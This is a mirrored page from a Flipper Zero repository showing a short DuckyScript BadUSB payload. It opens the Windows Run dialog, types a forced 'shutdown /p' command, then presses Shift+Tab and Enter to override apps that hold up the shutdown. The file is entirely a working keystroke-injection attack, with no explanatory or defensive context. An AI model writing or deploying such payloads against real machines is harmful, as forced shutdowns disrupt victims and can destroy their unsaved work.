mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-23 15:00:13 +00:00
13 lines
173 B
Plaintext
13 lines
173 B
Plaintext
|
DELAY 500
|
||
|
GUI R
|
||
|
DELAY 500
|
||
|
REM STRING shutdown /s /t 0
|
||
|
STRING shutdown /p
|
||
|
DELAY 100
|
||
|
ENTER
|
||
|
|
||
|
REM Handle apps preventing computer from shutting down
|
||
|
DELAY 20000
|
||
|
SHIFT TAB
|
||
|
ENTER
|